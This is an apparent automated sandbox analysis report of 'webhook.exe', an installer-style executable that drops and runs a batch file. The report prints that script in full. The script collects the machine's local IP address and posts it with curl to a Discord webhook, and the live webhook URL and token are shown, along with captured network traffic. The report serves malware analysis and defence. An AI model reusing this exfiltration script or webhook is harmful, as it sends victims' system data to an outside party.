                        Reputation:low
                        Preview:@echo off..setlocal....:: Replace this with your actual webhook URL..set "webhook_url=https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ"....:: Get the local IP address..for /f "tokens=2 delims=:" %%a in ('ipconfig ^| findstr /i "IPv4"') do set "ip=%%a"..set "ip=%ip:~1%"....:: Check if Google Chrome is installed..set "chrome_installed="..if exist "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" (.. set "chrome_installed=Chrome is installed."..) else (.. set "chrome_installed=Chrome is not installed."..)....:: Set the message with the IP address and browser info..set "message=My local IP address is: %ip%`n%s"....:: Create a temporary JSON file..set "temp_json=%temp%\discord_webhook.json"..(.. echo {.. echo "content": "%message%".. echo }..) > "%temp_json%"....:: Send the POST request using curl..curl -H "Content-Type: application/json" -d @"%temp_json%" "%webhook_url%"....:: Clean up..
                        Process:C:\Windows\System32\cmd.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):63
                        Entropy (8bit):4.576663559094717
                        Encrypted:false
                        SSDEEP:3:3FFmKLmd1zEGEY+3QwoFXWJbRFhAyn:3FFmQiNvEJQHwbdAyn
                        MD5:6E9B1CEC9721356D33D5D7D329891F50
                        SHA1:20A5C056A34AEBB3D6D88299B469C382CFED3C95
                        SHA-256:9612EB75E415D5518E468B8CD764EE41CF318C140FB27007E2E5815E6E57E160
                        SHA-512:0579FB4FF7FFA32FFC533507592A7BE7ABD1D432B592688ACD41F84DB160858AC8EF43F7CC1BFAA30F00B8E16F9EB9E5F367E32B0EC98765058C0E27CFBC2218
                        Malicious:false
                        Reputation:low
                        Preview:{.. "content": "My local IP address is: 192.168.2.4`ns"..}..
                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                        Entropy (8bit):6.30405433517673
                        TrID:
                        • Win64 Executable GUI (202006/5) 92.65%
                        • Win64 Executable (generic) (12005/4) 5.51%
                        • Generic Win/DOS Executable (2004/3) 0.92%
                        • DOS Executable Generic (2002/1) 0.92%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:webhook.exe
                        File size:188'416 bytes
                        MD5:5765bde6d3062b30890598996b671db0
                        SHA1:5b36dcecd5e3ba131fc05973179bffbbec08291d
                        SHA256:ebc2dba491422a0c420cc22ffe91483fe4885ecfae57baa2ed207252d9afd5de
                        SHA512:b7522888759ab43921328457c213d77338abc28cb967c645c82f26295dbc498937bb2c52dd7bb9252693ab3b26e221d26ac516acd2e4eb6fee5bf7f9bb7e839f
                        SSDEEP:3072:7MobR7ezAjLOZvmX165GWp1icKAArDZz4N9GhbkrNEk+5fJ3qa1lE+o:IeR7eamm+p0yN90QE9
                        TLSH:31047B0A27E62066F0B25B7099F202C34A79BCA37BB592BF5784817D0E336C49571F72
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .'8d.Ikd.Ikd.Ik/.Lje.Ik/.Jjg.Ik/.Mjw.Ik/.Hju.Ikd.Hk..Ik/.Ajn.Ik/..ke.Ik/.Kje.IkRichd.Ik................PE..d..._............."
                        Icon Hash:3b6120282c4c5a1f
                        Entrypoint:0x140001150
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x140000000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Time Stamp:0xD97FD45F [Sun Aug 19 04:21:51 2085 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:10
                        OS Version Minor:0
                        File Version Major:10
                        File Version Minor:0
                        Subsystem Version Major:10
                        Subsystem Version Minor:0
                        Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
                        Instruction
                        dec eax
                        sub esp, 28h
                        call 00007F0761094FD0h
                        dec eax
                        add esp, 28h
                        jmp 00007F076109484Bh
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        dec eax
                        mov dword ptr [esp+08h], ebx
                        dec eax
                        mov dword ptr [esp+10h], edi
                        inc ecx
                        push esi
                        dec eax
                        sub esp, 000000B0h
                        and dword ptr [esp+20h], 00000000h
                        dec eax
                        lea ecx, dword ptr [esp+40h]
                        call dword ptr [000082A5h]
                        nop
                        dec eax
                        mov eax, dword ptr [00000030h]
                        dec eax
                        mov ebx, dword ptr [eax+08h]
                        xor edi, edi
                        xor eax, eax
                        dec eax
                        cmpxchg dword ptr [0000B9D2h], ebx
                        je 00007F076109484Ch
                        dec eax
                        cmp eax, ebx
                        jne 00007F076109485Fh
                        mov edi, 00000001h
                        mov eax, dword ptr [0000B9C8h]
                        cmp eax, 01h
                        jne 00007F076109485Ch
                        lea ecx, dword ptr [eax+1Eh]
                        call 00007F0761094E64h
                        jmp 00007F07610948C9h
                        mov ecx, 000003E8h
                        call dword ptr [00008253h]
                        jmp 00007F0761094806h
                        mov eax, dword ptr [0000B9A3h]
                        test eax, eax
                        jne 00007F07610948A5h
                        mov dword ptr [0000B995h], 00000001h
                        dec esp
                        lea esi, dword ptr [000084DEh]
                        dec eax
                        lea ebx, dword ptr [000084BFh]
                        dec eax
                        mov dword ptr [esp+30h], ebx
                        mov dword ptr [esp+24h], eax
                        dec ecx
                        cmp ebx, esi
                        jnc 00007F0761094871h
                        test eax, eax
                        jne 00007F0761094871h
                        dec eax
                        cmp dword ptr [ebx], 00000000h
                        je 00007F076109485Ch
                        dec ecx
                        mov edx, 5E523070h
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa3940xb4.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x1e0d4.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x444.pdata
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000x30.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x9a780x54.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x140.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x91500x520.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x7eb00x80008f5ddc5fa0c3119d30f7e00d7bfd48aaFalse0.547576904296875data6.109997796878264IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x90000x24200x300079a5acf192c71ab3579d24a79e81e45bFalse0.3240559895833333data3.9065058401206216IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xc0000x1f000x1000f198899505f620007167379f74f8141cFalse0.083251953125data1.0384025678015962IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .pdata0xe0000x4440x1000d87d18cc3448a50b581d9a9660a39914False0.164306640625PEX Binary Archive1.4622023798757706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .rsrc0xf0000x1f0000x1f000bbe705de4a7a23fcb6d7820b74eeda77False0.6625346522177419data6.821649689100556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x2e0000x300x1000b86e33c1f7fc5de5ef683b7d6eea5c32False0.01806640625data0.11282277483477143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        AVI0xfb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                        RT_ICON0x1294c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                        RT_ICON0x12fb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                        RT_ICON0x1329c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                        RT_ICON0x134840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                        RT_ICON0x135ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                        RT_ICON0x144540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                        RT_ICON0x14cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                        RT_ICON0x153c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                        RT_ICON0x1592c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                        RT_ICON0x233000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                        RT_ICON0x258a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                        RT_ICON0x269500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                        RT_ICON0x272d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                        RT_DIALOG0x277400x2f2dataEnglishUnited States0.4389920424403183
                        RT_DIALOG0x27a340x30cdataSwedishSweden0.4371794871794872
                        RT_DIALOG0x27d400x1b0dataEnglishUnited States0.5625
                        RT_DIALOG0x27ef00x1b0dataSwedishSweden0.5578703703703703
                        RT_DIALOG0x280a00x166dataEnglishUnited States0.5223463687150838
                        RT_DIALOG0x282080x148dataSwedishSweden0.5274390243902439
                        RT_DIALOG0x283500x1c0dataEnglishUnited States0.5446428571428571
                        RT_DIALOG0x285100x1b0dataSwedishSweden0.5532407407407407
                        RT_DIALOG0x286c00x130dataEnglishUnited States0.5526315789473685
                        RT_DIALOG0x287f00x11edataSwedishSweden0.541958041958042
                        RT_DIALOG0x289100x120dataEnglishUnited States0.5763888888888888
                        RT_DIALOG0x28a300x118dataSwedishSweden0.5857142857142857
                        RT_STRING0x28b480x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
                        RT_STRING0x28bd40x8cMatlab v4 mat-file (little endian) \344, numeric, rows 0, columns 0SwedishSweden0.6285714285714286
                        RT_STRING0x28c600x520dataEnglishUnited States0.4032012195121951
                        RT_STRING0x291800x59cdataSwedishSweden0.3544568245125348
                        RT_STRING0x2971c0x5ccdataEnglishUnited States0.36455525606469
                        RT_STRING0x29ce80x672dataSwedishSweden0.34424242424242424
                        RT_STRING0x2a35c0x4b0dataEnglishUnited States0.385
                        RT_STRING0x2a80c0x506dataSwedishSweden0.36702954898911355
                        RT_STRING0x2ad140x44adataEnglishUnited States0.3970856102003643
                        RT_STRING0x2b1600x43cdataSwedishSweden0.4188191881918819
                        RT_STRING0x2b59c0x3cedataEnglishUnited States0.36858316221765913
                        RT_STRING0x2b96c0x332dataSwedishSweden0.38264058679706603
                        RT_RCDATA0x2bca00x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                        RT_RCDATA0x2bca80x2daMicrosoft Cabinet archive data, Windows 2000/XP setup, 730 bytes, 1 file, at 0x2c +A "webhook.bat", ID 1108, number 1, 1 datablock, 0x1503 compressionSwedishSweden1.015068493150685
                        RT_RCDATA0x2bf840x4dataSwedishSweden3.0
                        RT_RCDATA0x2bf880x24dataSwedishSweden0.8055555555555556
                        RT_RCDATA0x2bfac0x7ASCII text, with no line terminatorsSwedishSweden2.142857142857143
                        RT_RCDATA0x2bfb40x7ASCII text, with no line terminatorsSwedishSweden2.142857142857143
                        RT_RCDATA0x2bfbc0x4dataSwedishSweden3.0
                        RT_RCDATA0x2bfc00x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                        RT_RCDATA0x2bfc80x4dataSwedishSweden3.0
                        RT_RCDATA0x2bfcc0x15ASCII text, with no line terminatorsEnglishUnited States1.380952380952381
                        RT_RCDATA0x2bfe40x4dataSwedishSweden3.0
                        RT_RCDATA0x2bfe80x2dataSwedishSweden5.0
                        RT_RCDATA0x2bfec0x7ASCII text, with no line terminatorsSwedishSweden2.142857142857143
                        RT_RCDATA0x2bff40x13ASCII text, with no line terminatorsEnglishUnited States1.4210526315789473
                        RT_GROUP_ICON0x2c0080xbcdataEnglishUnited States0.6117021276595744
                        RT_VERSION0x2c0c40x408dataEnglishUnited States0.42054263565891475
                        RT_VERSION0x2c4cc0x420dataSwedishSweden0.4384469696969697
                        RT_MANIFEST0x2c8ec0x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906
                        DLLImport
                        ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                        KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                        GDI32.dllGetDeviceCaps
                        USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
                        msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
                        COMCTL32.dll
                        Cabinet.dll
                        VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        SwedishSweden
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 16, 2024 08:30:10.588248014 CET49734443192.168.2.4162.159.138.232
                        Dec 16, 2024 08:30:10.588305950 CET44349734162.159.138.232192.168.2.4
                        Dec 16, 2024 08:30:10.588459015 CET49734443192.168.2.4162.159.138.232
                        Dec 16, 2024 08:30:10.621907949 CET49734443192.168.2.4162.159.138.232
                        Dec 16, 2024 08:30:10.621926069 CET44349734162.159.138.232192.168.2.4
                        Dec 16, 2024 08:30:11.841404915 CET44349734162.159.138.232192.168.2.4
                        Dec 16, 2024 08:30:11.841487885 CET49734443192.168.2.4162.159.138.232
                        Dec 16, 2024 08:30:11.844814062 CET49734443192.168.2.4162.159.138.232
                        Dec 16, 2024 08:30:11.844825983 CET44349734162.159.138.232192.168.2.4
                        Dec 16, 2024 08:30:11.845093012 CET44349734162.159.138.232192.168.2.4
                        Dec 16, 2024 08:30:11.847923994 CET49734443192.168.2.4162.159.138.232
                        Dec 16, 2024 08:30:11.895327091 CET44349734162.159.138.232192.168.2.4
                        Dec 16, 2024 08:30:12.365638971 CET44349734162.159.138.232192.168.2.4
                        Dec 16, 2024 08:30:12.365770102 CET44349734162.159.138.232192.168.2.4
                        Dec 16, 2024 08:30:12.365963936 CET49734443192.168.2.4162.159.138.232
                        Dec 16, 2024 08:30:12.367583036 CET49734443192.168.2.4162.159.138.232
                        Dec 16, 2024 08:30:12.367604017 CET44349734162.159.138.232192.168.2.4
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 16, 2024 08:30:10.441389084 CET6427153192.168.2.41.1.1.1
                        Dec 16, 2024 08:30:10.581599951 CET53642711.1.1.1192.168.2.4
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Dec 16, 2024 08:30:10.441389084 CET192.168.2.41.1.1.10xa60eStandard query (0)discord.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Dec 16, 2024 08:30:10.581599951 CET1.1.1.1192.168.2.40xa60eNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                        Dec 16, 2024 08:30:10.581599951 CET1.1.1.1192.168.2.40xa60eNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                        Dec 16, 2024 08:30:10.581599951 CET1.1.1.1192.168.2.40xa60eNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                        Dec 16, 2024 08:30:10.581599951 CET1.1.1.1192.168.2.40xa60eNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                        Dec 16, 2024 08:30:10.581599951 CET1.1.1.1192.168.2.40xa60eNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                        • discord.com
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449734162.159.138.2324433340C:\Windows\System32\curl.exe
                        TimestampBytes transferredDirectionData
                        2024-12-16 07:30:11 UTC229OUTPOST /api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ HTTP/1.1
                        Host: discord.com
                        User-Agent: curl/7.83.1
                        Accept: */*
                        Content-Type: application/json
                        Content-Length: 57
                        2024-12-16 07:30:11 UTC57OUTData Raw: 7b 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 22 4d 79 20 6c 6f 63 61 6c 20 49 50 20 61 64 64 72 65 73 73 20 69 73 3a 20 31 39 32 2e 31 36 38 2e 32 2e 34 60 6e 73 22 7d
                        Data Ascii: { "content": "My local IP address is: 192.168.2.4`ns"}
                        2024-12-16 07:30:12 UTC1356INHTTP/1.1 204 No Content
                        Date: Mon, 16 Dec 2024 07:30:12 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        Set-Cookie: __dcfduid=95e6ff5cbb7f11ef8d640a6546079b99; Expires=Sat, 15-Dec-2029 07:30:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                        x-ratelimit-limit: 5
                        x-ratelimit-remaining: 4
                        x-ratelimit-reset: 1734334213
                        x-ratelimit-reset-after: 1
                        via: 1.1 google
                        alt-svc: h3=":443"; ma=86400
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3oAD84pfky9V7HO%2BzGX8Op3D%2F3xBKD1nzpV3lv%2FNFomZNMtM1Ydl2JRufQqWXeC2AZbbXRzd9ptUKbyYm8tCO0xyVMBbQT47DHjeUKQzssFR%2FMgeu8AzIPwKxES1"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Content-Type-Options: nosniff
                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                        Set-Cookie: __sdcfduid=95e6ff5cbb7f11ef8d640a6546079b99860010102cfcfdfbce5771b4a35c1a559f9dcdf0d455c608feb3ebb90a9e5057; Expires=Sat, 15-Dec-2029 07:30:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                        Set-Cookie: __cfruid=431c83f5438cff61c4aedf977ed8e956d536930d-1734334212; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                        2024-12-16 07:30:12 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 35 56 48 48 4d 58 39 58 41 51 7a 79 77 59 43 70 38 76 79 4d 41 6f 2e 56 47 46 36 43 4f 2e 56 6b 6b 52 6c 71 57 4a 34 35 37 75 49 2d 31 37 33 34 33 33 34 32 31 32 32 30 38 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 32 63 66 37 37 39 62 66 31 65 34 33 34 33 2d 45 57 52 0d 0a 0d 0a
                        Data Ascii: Set-Cookie: _cfuvid=5VHHMX9XAQzywYCp8vyMAo.VGF6CO.VkkRlqWJ457uI-1734334212208-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f2cf779bf1e4343-EWR


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:02:30:08
                        Start date:16/12/2024
                        Path:C:\Users\user\Desktop\webhook.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\webhook.exe"
                        Imagebase:0x7ff650540000
                        File size:188'416 bytes
                        MD5 hash:5765BDE6D3062B30890598996B671DB0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:02:30:08
                        Start date:16/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c "webhook.bat"
                        Imagebase:0x7ff600a80000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:02:30:08
                        Start date:16/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:02:30:09
                        Start date:16/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ipconfig | findstr /i "IPv4"
                        Imagebase:0x7ff600a80000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:02:30:09
                        Start date:16/12/2024
                        Path:C:\Windows\System32\ipconfig.exe
                        Wow64 process (32bit):false
                        Commandline:ipconfig
                        Imagebase:0x7ff6e94b0000
                        File size:35'840 bytes
                        MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:5
                        Start time:02:30:09
                        Start date:16/12/2024
                        Path:C:\Windows\System32\findstr.exe
                        Wow64 process (32bit):false
                        Commandline:findstr /i "IPv4"
                        Imagebase:0x7ff7de2e0000
                        File size:36'352 bytes
                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:6
                        Start time:02:30:09
                        Start date:16/12/2024
                        Path:C:\Windows\System32\curl.exe
                        Wow64 process (32bit):false
                        Commandline:curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ"
                        Imagebase:0x7ff60c910000
                        File size:530'944 bytes
                        MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:24.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:40.8%
                          Total number of Nodes:989
                          Total number of Limit Nodes:43
                          execution_graph 3136 7ff6505483da 3137 7ff6505483ae 3136->3137 3138 7ff6505483e0 GlobalFree 3136->3138 3139 7ff6505413e0 7 API calls 3137->3139 3140 7ff6505483bb 3139->3140 3141 7ff65054391b SendMessageA 3142 7ff65054499e 3143 7ff6505449c3 3142->3143 3144 7ff650544a99 3142->3144 3143->3144 3145 7ff6505449d8 3143->3145 3146 7ff650544aa1 GetDesktopWindow 3143->3146 3147 7ff650544baa EndDialog 3144->3147 3153 7ff6505449e4 3144->3153 3149 7ff6505449dc 3145->3149 3150 7ff650544a0b 3145->3150 3164 7ff650543c8c 6 API calls 3146->3164 3147->3153 3152 7ff6505449eb TerminateThread 3149->3152 3149->3153 3150->3153 3154 7ff650544a15 ResetEvent 3150->3154 3152->3147 3157 7ff6505461e8 24 API calls 3154->3157 3155 7ff650544ac8 GetDlgItem SendMessageA GetDlgItem SendMessageA 3156 7ff650544b2b SetWindowTextA CreateThread 3155->3156 3156->3153 3158 7ff650544b78 3156->3158 3159 7ff650544a53 3157->3159 3160 7ff6505461e8 24 API calls 3158->3160 3161 7ff650544a74 SetEvent 3159->3161 3162 7ff650544a5c SetEvent 3159->3162 3160->3144 3163 7ff650547f58 3 API calls 3161->3163 3162->3153 3163->3144 3166 7ff650543d63 SetWindowPos 3164->3166 3167 7ff6505413e0 7 API calls 3166->3167 3168 7ff650543dce 3167->3168 3168->3155 3168->3156 3169 7ff65054619e 3170 7ff6505461ac 3169->3170 3171 7ff6505461bb CallWindowProcA 3169->3171 3170->3171 3172 7ff6505461b7 3170->3172 3171->3172 3173 7ff65054669e 3174 7ff6505466b2 3173->3174 3180 7ff6505466ba 3173->3180 3176 7ff6505466ec GetDesktopWindow 3174->3176 3174->3180 3175 7ff65054674a EndDialog 3179 7ff6505466bf 3175->3179 3177 7ff650543c8c 14 API calls 3176->3177 3178 7ff650546703 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3177->3178 3178->3179 3180->3175 3180->3179 3181 7ff650544bde 3182 7ff650544bfb FindResourceA LoadResource LockResource 3181->3182 3183 7ff650545140 7 API calls 3181->3183 3184 7ff650544c4c 3182->3184 3185 7ff650544e1f 3182->3185 3183->3182 3186 7ff650544c58 GetDlgItem ShowWindow GetDlgItem ShowWindow 3184->3186 3187 7ff650544ca6 3184->3187 3186->3187 3188 7ff650547e28 33 API calls 3187->3188 3189 7ff650544cab 3188->3189 3190 7ff650544cb9 #20 3189->3190 3191 7ff650544caf 3189->3191 3190->3191 3192 7ff650544d21 #22 3190->3192 3193 7ff6505461e8 24 API calls 3191->3193 3194 7ff650544da3 3192->3194 3195 7ff650544d65 #23 3192->3195 3193->3194 3196 7ff650544db1 FreeResource 3194->3196 3197 7ff650544dc5 3194->3197 3195->3191 3195->3194 3196->3197 3198 7ff650544def 3197->3198 3199 7ff6505461e8 24 API calls 3197->3199 3198->3185 